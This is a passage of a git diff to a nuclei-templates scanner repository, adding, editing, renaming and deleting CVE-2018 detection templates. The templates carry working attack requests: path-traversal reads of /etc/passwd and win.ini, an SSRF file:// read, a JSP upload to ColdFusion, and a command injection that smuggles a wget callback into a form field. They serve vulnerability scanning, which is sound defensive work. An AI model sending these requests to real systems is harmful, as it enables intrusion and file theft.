'{{BaseURL}}/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd' + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0:" + part: body + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-12675.yaml b/nuclei-templates/CVE-2018/CVE-2018-12675.yaml index 2a10a92033..52e4353249 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-12675.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-12675.yaml @@ -1,32 +1,44 @@ id: CVE-2018-12675 info: - name: SV3C HD Camera L-SERIES - Open Redirect + name: SV3C HD Camera L Series - Open Redirect author: 0x_Akoko severity: medium description: | - The SV3C HD Camera (L-SERIES V2.3.4.2103-S50-NTD-B20170508B and V2.3.4.2103-S50-NTD-B20170823B) does not perform origin checks on URLs that the camera's web interface redirects a user to. This can be leveraged to send a user to an unexpected endpoint. + SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can use this vulnerability to redirect users to malicious websites, leading to phishing attacks. + remediation: | + Apply the latest firmware update provided by the vendor to fix the open redirect vulnerability. reference: - https://bishopfox.com/blog/sv3c-l-series-hd-camera-advisory - https://vuldb.com/?id.125799 - - https://nvd.nist.gov/vuln/detail/CVE-2018-12675 - https://www.bishopfox.com/news/2018/10/sv3c-l-series-hd-camera-multiple-vulnerabilities/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-12675 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2018-12675 cwe-id: CWE-601 + epss-score: 0.00118 + epss-percentile: 0.44971 + cpe: cpe:2.3:o:sv3c:h.264_poe_ip_camera_firmware:v2.3.4.2103-s50-ntd-b20170508b:*:*:*:*:*:*:* metadata: - verified: "true" + verified: true + max-request: 1 + vendor: sv3c + product: h.264_poe_ip_camera_firmware tags: cve,cve2018,redirect,sv3c,camera,iot -requests: +http: - method: GET path: - - '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Fattacker.com' + - '{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh' matchers: - type: word part: body words: - - '' + - '' +# digest: 4a0a00473045022100fe1e9de738122538a2449b660acfbadd5b2f6e95f978b4fd052467bb4f222c1b022077728b007829328b0aa238c9635a5106d04c04ef695ec1557e91b4b5b46cb70f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/CVE-2018-1271.yaml b/nuclei-templates/CVE-2018/CVE-2018-1271.yaml new file mode 100644 index 0000000000..548327e206 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-1271.yaml @@ -0,0 +1,30 @@ +id: CVE-2018-1271 +info: + name: Spring MVC Directory Traversal Vulnerability + author: hetroublemakr + severity: medium + description: Spring Framework, versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported versions, allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). When static resources are served from a file system on Windows (as opposed to the classpath, or the ServletContext), a malicious user can send a request using a specially crafted URL that can lead a directory traversal attack. + reference: + - https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d + - https://pivotal.io/security/cve-2018-1271 + - http://web.archive.org/web/20210518132800/https://www.securityfocus.com/bid/103699 + - https://access.redhat.com/errata/RHSA-2018:1320 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 5.9 + cve-id: CVE-2018-1271 + cwe-id: CWE-22 + tags: cve,cve2018,spring,lfi,traversal +requests: + - method: GET + path: + - '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' + - '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini' + matchers-condition: and + matchers: + - type: word + words: + - 'for 16-bit app support' + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-12998.yaml b/nuclei-templates/CVE-2018/CVE-2018-12998.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-12998.yaml rename to nuclei-templates/CVE-2018/CVE-2018-12998.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-1335.yaml b/nuclei-templates/CVE-2018/CVE-2018-1335.yaml index 1805b0a5ec..87f73ec29a 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-1335.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-1335.yaml @@ -4,17 +4,15 @@ info: name: Apache Tika 1.15-1.17 Header Command Injection author: pikpikcu severity: high - description: From Apache Tika versions 1.7 to 1.17, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients. The mitigation is to upgrade to Tika 1.18. reference: - https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/ - https://www.exploit-db.com/exploits/47208 - - https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E - - http://www.securityfocus.com/bid/104001 + tags: cve,cve2018,apache,tika,rce classification: cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.1 + cvss-score: 8.10 cve-id: CVE-2018-1335 - tags: cve,cve2018,apache,tika,rce + description: "From Apache Tika versions 1.7 to 1.17, clients could send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients. The mitigation is to upgrade to Tika 1.18." requests: - method: PUT diff --git a/nuclei-templates/CVE-2018/cve-2018-13379.yaml b/nuclei-templates/CVE-2018/CVE-2018-13379.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-13379.yaml rename to nuclei-templates/CVE-2018/CVE-2018-13379.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-13980.yaml b/nuclei-templates/CVE-2018/CVE-2018-13980.yaml deleted file mode 100644 index fd9ee56799..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-13980.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2018-13980 - -info: - name: Zeta Producer Desktop CMS 14.2.0 - Arbitrary File Retrieval - author: wisnupramoedya - severity: medium - description: The websites that were built from Zeta Producer Desktop CMS before 14.2.1 are vulnerable to unauthenticated file disclosure if the plugin "filebrowser" is installed, because of assets/php/filebrowser/filebrowser.main.php?file=../ directory traversal. - reference: - - https://www.exploit-db.com/exploits/45016 - - https://nvd.nist.gov/vuln/detail/CVE-2018-13980 - - https://www.sec-consult.com/en/blog/advisories/remote-code-execution-local-file-disclosure-zeta-producer-desktop-cms/ - - http://packetstormsecurity.com/files/148537/Zeta-Producer-Desktop-CMS-14.2.0-Code-Execution-File-Disclosure.html - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N - cvss-score: 5.5 - cve-id: CVE-2018-13980 - cwe-id: CWE-22 - tags: cve,cve2018,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-14013.yaml b/nuclei-templates/CVE-2018/CVE-2018-14013.yaml index 443cec53b7..cee7520213 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-14013.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-14013.yaml @@ -5,17 +5,13 @@ info: author: pikpikcu severity: medium description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 has XSS in the AJAX and html web clients. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-14013 - - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories - - https://bugzilla.zimbra.com/show_bug.cgi?id=109018 - - https://bugzilla.zimbra.com/show_bug.cgi?id=109017 + reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013 + tags: cve,cve2018,xss,zimbra classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2018-14013 cwe-id: CWE-79 - tags: cve,cve2018,xss,zimbra requests: - method: GET diff --git a/nuclei-templates/CVE-2018/CVE-2018-14064.yaml b/nuclei-templates/CVE-2018/CVE-2018-14064.yaml index d8cf45f3a7..f3452b953f 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-14064.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-14064.yaml @@ -4,17 +4,17 @@ info: name: VelotiSmart Wifi - Directory Traversal author: 0x_Akoko severity: critical - description: VelotiSmart WiFi B-380 camera devices allow directory traversal via the uc-http service 1.0.0, as demonstrated by /../../etc/passwd on TCP port 80. + description: The uc-http service 1.0.0 on VelotiSmart WiFi B-380 camera devices allows Directory Traversal, as demonstrated by /../../etc/passwd on TCP port 80. reference: - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac - https://www.exploit-db.com/exploits/45030 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064 + tags: cve,cve2018,lfi,camera,iot classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2018-14064 cwe-id: CWE-22 - tags: cve,cve2018,lfi,camera,iot requests: - method: GET @@ -31,5 +31,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2018/cve-2018-14574.yaml b/nuclei-templates/CVE-2018/CVE-2018-14574.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-14574.yaml rename to nuclei-templates/CVE-2018/CVE-2018-14574.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-14728.yaml b/nuclei-templates/CVE-2018/CVE-2018-14728.yaml new file mode 100644 index 0000000000..ab3eb88100 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-14728.yaml @@ -0,0 +1,32 @@ +id: CVE-2018-14728 + +info: + name: Responsive filemanager 9.13.1 Server-Side Request Forgery + author: madrobot + severity: critical + description: Responsive filemanager 9.13.1 is susceptible to server-side request forgery in upload.php via the url parameter. + reference: + - http://packetstormsecurity.com/files/148742/Responsive-Filemanager-9.13.1-Server-Side-Request-Forgery.html + - https://www.exploit-db.com/exploits/45103/ + - https://nvd.nist.gov/vuln/detail/CVE-2018-14728 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-14728 + cwe-id: CWE-918 + tags: cve,cve2018,ssrf,lfi + +requests: + - method: POST + path: + - "{{BaseURL}}/filemanager/upload.php" + + body: "fldr=&url=file:///etc/passwd" + + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + +# Enhanced by mp on 2022/04/01 diff --git a/nuclei-templates/CVE-2018/cve-2018-14912.yaml b/nuclei-templates/CVE-2018/CVE-2018-14912.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-14912.yaml rename to nuclei-templates/CVE-2018/CVE-2018-14912.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-14916.yaml b/nuclei-templates/CVE-2018/CVE-2018-14916.yaml deleted file mode 100644 index 5f54fb11ce..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-14916.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: CVE-2018-14916 - -info: - name: Loytec LGATE-902 <6.4.2 - Local File Inclusion - author: 0x_Akoko - severity: critical - description: Loytec LGATE-902 versions prior to 6.4.2 suffers from a local file inclusion vulnerability. - reference: - - https://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html - - https://nvd.nist.gov/vuln/detail/CVE-2018-14916 - - http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html - - https://seclists.org/fulldisclosure/2019/Apr/12 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H - cvss-score: 9.1 - cve-id: CVE-2018-14916 - cwe-id: CWE-732 - tags: cve,cve2018,loytec,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2018/cve-2018-14918.yaml b/nuclei-templates/CVE-2018/CVE-2018-14918.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-14918.yaml rename to nuclei-templates/CVE-2018/CVE-2018-14918.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-15138.yaml b/nuclei-templates/CVE-2018/CVE-2018-15138.yaml deleted file mode 100644 index cca957188f..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-15138.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2018-15138 - -info: - name: LG-Ericsson iPECS NMS 30M Directory Traversal - author: 0x_Akoko - severity: high - description: Ericsson-LG iPECS NMS 30M allows directory traversal via ipecs-cm/download?filename=../ URIs. - reference: - - https://cxsecurity.com/issue/WLB-2018080070 - - https://nvd.nist.gov/vuln/detail/CVE-2018-15138 - - https://www.exploit-db.com/exploits/45167/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-15138 - cwe-id: CWE-22 - tags: cve,cve2018,ericsson,lfi,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data" - - "{{BaseURL}}/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-15473.yaml b/nuclei-templates/CVE-2018/CVE-2018-15473.yaml deleted file mode 100644 index 2392e8714b..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-15473.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2018-15473 -info: - name: OpenSSH Username Enumeration <= v7.7 - author: r3dg33k,daffainfo,forgedhallpass - severity: medium - description: OpenSSH through 7.7 is prone to a user enumeration vulnerability due to not delaying bailout for an invalid authenticating user until after the packet containing the request has been fully parsed, related to auth2-gss.c, auth2-hostbased.c, and auth2-pubkey.c. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-15473 - - https://github.com/openbsd/src/commit/779974d35b4859c07bc3cb8a12c74b43b0a7d1e0 - - https://bugs.debian.org/906236 - - http://www.openwall.com/lists/oss-security/2018/08/15/5 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2018-15473 - cwe-id: CWE-362 - tags: network,openssh,cve,cve2018 -network: - - host: - - "{{Hostname}}" - - "{{Host}}:22" - matchers: - - type: regex - regex: - - '(?i)SSH-2.0-OpenSSH_(?:[1-6][^\d][^\r]+|7\.[0-7][^\d][^\r]+)' - extractors: - - type: regex - regex: - - '(?i)SSH-2.0-OpenSSH_[^\r]+' diff --git a/nuclei-templates/CVE-2018/CVE-2018-15517.yaml b/nuclei-templates/CVE-2018/CVE-2018-15517.yaml index 8e37ed929f..a6c7089cc6 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-15517.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-15517.yaml @@ -1,21 +1,18 @@ id: CVE-2018-15517 info: - name: D-Link Central WifiManager - Server-Side Request Forgery - author: gy741 - severity: high - description: D-Link Central WifiManager is susceptible to server-side request forgery. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using a browser. + name: D-LINK Central WifiManager - SSRF + description: Using a web browser or script SSRF can be initiated against internal/external systems to conduct port scans by leveraging D LINKs MailConnect component. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using Web Browser. reference: - http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15517 - - http://seclists.org/fulldisclosure/2018/Nov/28 - - http://packetstormsecurity.com/files/150243/D-LINK-Central-WifiManager-CWM-100-1.03-r0098-Server-Side-Request-Forgery.html + author: gy741 + severity: high + tags: cve,cve2018,dlink,ssrf,oast classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N - cvss-score: 8.6 + cvss-score: 8.60 cve-id: CVE-2018-15517 cwe-id: CWE-918 - tags: cve,cve2018,dlink,ssrf,oast requests: - method: GET @@ -27,5 +24,3 @@ requests: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - -# Enhanced by mp on 2022/04/06 diff --git a/nuclei-templates/CVE-2018/cve-2018-15640.yaml b/nuclei-templates/CVE-2018/CVE-2018-15640.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-15640.yaml rename to nuclei-templates/CVE-2018/CVE-2018-15640.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-15657.yaml b/nuclei-templates/CVE-2018/CVE-2018-15657.yaml new file mode 100644 index 0000000000..9e75ab5103 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-15657.yaml @@ -0,0 +1,28 @@ +id: CVE-2018-15657 +info: + name: SureMDM Local / Remote File Inclusion + author: 0x_akoko + severity: high + description: SureMDM versions prior to the 2018-11 Patch suffers from local and remote file inclusion vulnerabilities. + reference: + - https://packetstormsecurity.com/files/151469/SureMDM-Local-Remote-File-Inclusion.html + - https://www.cvedetails.com/cve/CVE-2018-15657 + classification: + cvss-metrics: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.3 + cve-id: CVE-2018-15657 + cwe-id: CWE-918 + tags: cve,cve2018,suremdm,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/api/DownloadUrlResponse.ashx?url=file://C:/windows/win.ini" + stop-at-first-match: true + matchers: + - type: word + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and + part: body diff --git a/nuclei-templates/CVE-2018/CVE-2018-15745.yaml b/nuclei-templates/CVE-2018/CVE-2018-15745.yaml deleted file mode 100644 index d271e88968..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-15745.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2018-15745 - -info: - name: Argus Surveillance DVR - Directory Traversal - author: gy741 - severity: high - description: Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter. - reference: - - http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt - - http://packetstormsecurity.com/files/149134/Argus-Surveillance-DVR-4.0.0.0-Directory-Traversal.html - - https://www.exploit-db.com/exploits/45296/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-15745 - cwe-id: CWE-22 - tags: cve,cve2018,argussurveillance,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - "for 16-bit app support" - - "[drivers]" - condition: and diff --git a/nuclei-templates/CVE-2018/CVE-2018-15961.yaml b/nuclei-templates/CVE-2018/CVE-2018-15961.yaml deleted file mode 100644 index 8c9d54e30e..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-15961.yaml +++ /dev/null @@ -1,71 +0,0 @@ -id: CVE-2018-15961 - -info: - name: Adobe ColdFusion - Unrestricted File Upload Remote Code Execution - author: SkyLark-Lab,ImNightmaree - severity: critical - description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2018-15961 - - https://github.com/xbufu/CVE-2018-15961 - - https://helpx.adobe.com/security/products/coldfusion/apsb18-33.html - - http://www.securitytracker.com/id/1041621 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-15961 - cwe-id: CWE-434 - metadata: - shodan-query: http.component:"Adobe ColdFusion" - tags: cve,cve2018,adobe,rce,coldfusion,fileupload - -requests: - - raw: - - | - POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=---------------------------24464570528145 - - -----------------------------24464570528145 - Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp" - Content-Type: image/jpeg - - <%@ page import="java.util.*,java.io.*"%> - <%@ page import="java.security.MessageDigest"%> - <% - String cve = "CVE-2018-15961"; - MessageDigest alg = MessageDigest.getInstance("MD5"); - alg.reset(); - alg.update(cve.getBytes()); - byte[] digest = alg.digest(); - StringBuffer hashedpasswd = new StringBuffer(); - String hx; - for (int i=0;i - -----------------------------24464570528145 - Content-Disposition: form-data; name="path" - - {{randstr}}.jsp - -----------------------------24464570528145-- - - - | - GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - - type: word - words: - - "ddbb3e76f92e78c445c8ecb392beb225" # MD5 of CVE-2018-15961 - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/22 diff --git a/nuclei-templates/CVE-2018/CVE-2018-16133.yaml b/nuclei-templates/CVE-2018/CVE-2018-16133.yaml index 7e54e984da..6acefb5047 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-16133.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-16133.yaml @@ -1,5 +1,4 @@ id: CVE-2018-16133 - info: name: Cybrotech CyBroHttpServer 1.0.3 Directory Traversal author: 0x_Akoko @@ -9,7 +8,6 @@ info: - https://packetstormsecurity.com/files/149177/Cybrotech-CyBroHttpServer-1.0.3-Directory-Traversal.html - http://www.cybrotech.com/ - https://www.cvedetails.com/cve/CVE-2018-16133 - - https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 diff --git a/nuclei-templates/CVE-2018/CVE-2018-16167.yaml b/nuclei-templates/CVE-2018/CVE-2018-16167.yaml new file mode 100644 index 0000000000..11a6ae97f3 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-16167.yaml @@ -0,0 +1,36 @@ +id: CVE-2018-16167 + +info: + name: LogonTracer <=1.2.0 - Remote Command Injection + author: gy741 + severity: critical + description: LogonTracer 1.2.0 and earlier allows remote attackers to execute arbitrary OS commands via unspecified vectors. + reference: + - https://www.exploit-db.com/exploits/49918 + - https://nvd.nist.gov/vuln/detail/CVE-2018-16167 + - https://jvn.jp/en/vu/JVNVU98026636/index.html + - https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.1 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2018-16167 + cwe-id: CWE-78 + tags: cve,cve2018,logontracer,rce,oast + +requests: + - raw: + - | + POST /upload HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + logtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + +# Enhanced by mp on 2022/05/12 diff --git a/nuclei-templates/CVE-2018/CVE-2018-16283.yaml b/nuclei-templates/CVE-2018/CVE-2018-16283.yaml deleted file mode 100644 index 4c485ff4b7..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-16283.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2018-16283 - -info: - name: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion - author: 0x240x23elu - severity: critical - description: WordPress Wechat Broadcast plugin 1.2.0 and earlier allows Directory Traversal via the Image.php url parameter. - reference: - - https://www.exploit-db.com/exploits/45438 - - https://nvd.nist.gov/vuln/detail/CVE-2018-16283 - - https://github.com/springjk/wordpress-wechat-broadcast/issues/14 - - http://seclists.org/fulldisclosure/2018/Sep/32 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2018-16283 - cwe-id: CWE-22 - tags: cve,cve2018,wordpress,wp-plugin,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd" - - matchers: - - type: regex - regex: - - "root:.*:0:0:" - part: body - -# Enhanced by mp on 2022/04/26 diff --git a/nuclei-templates/CVE-2018/CVE-2018-16288.yaml b/nuclei-templates/CVE-2018/CVE-2018-16288.yaml deleted file mode 100644 index e90a28a2aa..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-16288.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: CVE-2018-16288 - -info: - name: LG SuperSign EZ CMS 2.5 - Local File Inclusion - author: daffainfo - severity: high - description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs. - reference: - - https://www.exploit-db.com/exploits/45440 - - https://www.cvedetails.com/cve/CVE-2018-16288 - - http://mamaquieroserpentester.blogspot.com/2018/09/multiple-vulnerabilities-in-lg.html - - https://www.exploit-db.com/exploits/45440/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 - cve-id: CVE-2018-16288 - cwe-id: CWE-200 - tags: cve,cve2018,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/cve-2018-16299.yaml b/nuclei-templates/CVE-2018/CVE-2018-16299.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16299.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16299.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-16341.yaml b/nuclei-templates/CVE-2018/CVE-2018-16341.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-16341.yaml rename to nuclei-templates/CVE-2018/CVE-2018-16341.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-16668.yaml b/nuclei-templates/CVE-2018/CVE-2018-16668.yaml deleted file mode 100644 index a4af5ea5ac..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-16668.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2018-16668 - -info: - name: CirCarLife SCADA Installation Paths - author: geeknik - severity: medium - description: System software installation path disclosure due to lack of authentication - reference: - - https://www.exploit-db.com/exploits/45384 - - https://github.com/SadFud/Exploits/tree/master/Real%20World/Suites/cir-pwn-life - - https://www.exploit-db.com/exploits/45384/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2018-16668 - cwe-id: CWE-287 - tags: cve,cve2018,circarlife,scada,iot,disclosure - -requests: - - method: GET - path: - - "{{BaseURL}}/html/repository" - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "CirCarLife 